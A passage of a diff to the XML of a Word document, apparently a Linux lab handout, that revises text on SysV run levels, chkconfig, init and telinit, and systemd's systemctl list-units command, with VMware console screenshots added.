+      <w:bookmarkStart w:id="0" w:name="_Hlk17375398"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>run level</w:t>
-      </w:r>
+        <w:t>/etc/rc.d/rc5.d</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">s.  Also, the files are kept in (say for </w:t>
+        <w:t>.  There is a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>run level</w:t>
+        <w:t>n</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 5) </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_Hlk17375398"/>
+        <w:t xml:space="preserve"> /etc/rc5.d, but it is just a symlink that points to </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>rc.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/rc5.d</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>.  There is a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>n</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/rc5.d, but it is just a symlink that points to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>rc.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/rc5.d.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">To ease the burden of keeping track of the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>symlinks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> in the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>rc.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> directories</w:t>
+        <w:t>/etc/rc.d/rc5.d.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>To ease the burden of keeping track of the symlinks in the rc.d directories</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">, </w:t>
@@ -1011,303 +761,532 @@
       <w:r>
         <w:t xml:space="preserve">called </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>chkconfig</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">, but it is not always part of the default installation.  The systemd utilities do not support the </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>chkconfig</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> command, so we won’t be able to use it here.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">  In addition to maintaining the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>rc.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> directories</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
+        <w:t xml:space="preserve">  In addition to maintaining the rc.d directories</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>, chkconfig</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --list</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> will also list the services on the VM (not supported in Ubuntu on systemd, though).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The SysV command to show the current </w:t>
+      </w:r>
+      <w:r>
+        <w:t>run level</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>runlevel</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.  It is supported by systemd, so go ahead and execute it.  It will show you the equivalent RedHat </w:t>
+      </w:r>
+      <w:r>
+        <w:t>run level</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, 5</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> for the GUI level.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The SysV command to change </w:t>
+      </w:r>
+      <w:r>
+        <w:t>run level</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>chkconfig</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --list</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> will also list the services on the VM (not supported in Ubuntu on systemd, though).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">The SysV command to show the current </w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> or </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>telinit</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is supported in systemd</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (note: it works in VMware Player 16.1.2 with Ubuntu </w:t>
+      </w:r>
+      <w:r>
+        <w:t>20.04 but</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> locks up in </w:t>
+      </w:r>
+      <w:r>
+        <w:t>VMware Player 15.1 and Ubuntu 18.04</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  The command to change to the Ubuntu console </w:t>
       </w:r>
       <w:r>
         <w:t>run level</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> is </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>runlevel</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">.  It is supported by systemd, so go ahead and execute it.  It will show you the equivalent RedHat </w:t>
-      </w:r>
-      <w:r>
-        <w:t>run level</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, 5</w:t>
+        <w:t xml:space="preserve"> would be </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(emergency)</w:t>
       </w:r>
       <w:r>
         <w:t>,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> for the GUI level.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">The SysV command to change </w:t>
-      </w:r>
-      <w:r>
-        <w:t>run level</w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve"> or</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init 2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (console only).  </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
         <w:t>s</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">udo </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>init</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> or </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>telinit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> would take you back to the GUI</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> or the old run level 5</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">If you have the correct versions, try executing </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">init </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.  Your VM will </w:t>
+      </w:r>
+      <w:r>
+        <w:t>drop</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> into a terminal-only mode.  What you will see is terminal with no GUI, like the sysadmins had in days of old.  Notice that there is no </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>scroll bar, so something that goes off the top of the screen is gone forever.  There is no mouse</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> pointer for cutting and pasting</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.  Omg, how did they manage?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03CA9A80" wp14:editId="498E14FC">
+            <wp:extent cx="4747565" cy="1357317"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="3" name="Picture 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4789643" cy="1369347"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">If the VM captures your mouse and will not release it, hit </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>cntl-alt</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to get it back.  Here’s what the console looks like.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A9CCE06" wp14:editId="6052A0C8">
+            <wp:extent cx="4849978" cy="822838"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="4" name="Picture 4" descr="Shape, rectangle&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="4" name="Picture 4" descr="Shape, rectangle&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4978676" cy="844673"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Log in and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>use sudo init 5</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to get back to the desktop.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="366FF839" wp14:editId="645F8F20">
+            <wp:extent cx="4879238" cy="2018420"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
+            <wp:docPr id="7" name="Picture 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4902875" cy="2028198"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The VM steals your mouse because VMware Tools (open-vm tools, really) are not running in console mode.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Systemd basics</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The closest systemd equivalent to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>chkconfig --list</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> from SysV is</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">systemctl list-units --type service --all.  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>Run this command in your VM and see if you can find ssh.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Note that if you use </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>systemctl list-units --type service</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (without the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>--all</w:t>
+      </w:r>
+      <w:r>
+        <w:t>) you won’t see ssh</w:t>
+      </w:r>
       <w:r>
         <w:t>,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> is supported in systemd but my Ubuntu VM (v18.04 LTS on VMware Workstation 15.1) locks up when I try to use it.  The command to change to the Ubuntu console </w:t>
-      </w:r>
-      <w:r>
-        <w:t>run level</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> would be </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 2</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> would take you back to the GUI.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Systemd basics</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">The closest systemd equivalent to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>chkconfig</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --list</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> from SysV is</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">systemctl list-units --type service --all.  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:t>Run this command in your VM and see if you can find ssh.</w:t>
+        <w:t xml:space="preserve"> since you </w:t>
+      </w:r>
+      <w:r>
+        <w:t>stopped</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> it in the previous step</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">When you see it with the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>--all</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> switch, you’ll probably find that ssh is inactive and dead.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  Try the command with and without the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>--all</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> switch.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Note that if you use </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>systemctl list-units --type service</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (without the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>--all</w:t>
-      </w:r>
-      <w:r>
-        <w:t>) you won’t see ssh</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> since you </w:t>
-      </w:r>
-      <w:r>
-        <w:t>stopped</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> it in the previous step</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">When you see it with the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>--all</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> switch, you’ll probably find that ssh is inactive and dead.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  Try the command with and without the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>--all</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> switch.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
       <w:r>
@@ -1688,43 +1667,43 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
